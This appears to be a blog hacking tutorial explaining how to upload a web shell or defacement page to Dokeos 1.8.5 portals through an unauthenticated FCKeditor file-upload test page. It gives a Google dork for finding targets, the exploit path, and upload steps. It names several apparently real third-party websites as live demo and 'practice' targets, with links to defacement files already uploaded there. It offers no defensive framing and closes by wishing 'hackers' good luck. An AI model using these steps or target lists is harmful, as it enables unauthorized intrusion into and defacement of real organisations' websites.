So lets get started...
Using this vulnerability hacker can upload shell or webpage without knowing user name or password.
To do this you need two things :
1st:
Google Dork : "Portail Dokeos 1.8.5"
(search for the string that is inside double quotes that we call a google dork)
2nd:
Exploit : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
(Its usually a url that hacker put to run his shell/you can say here uploading webpage)
Things that you need to do
Goto : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
change asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here To view your uploaded file go here : http://websitename/patch/main/upload/your file here
Live Demo :
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Output results :
http://www.kifofy.fr/kcours/main/upload/darksite.co.in.html
http://www.formation-microkine.fr/main/upload/darksite.co.in.html
More such url for practice:
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Good Luck Hcakers Stay awake for many such tutorials :)
Post a Comment
Feel Free To Ask Your Query we Love To Answer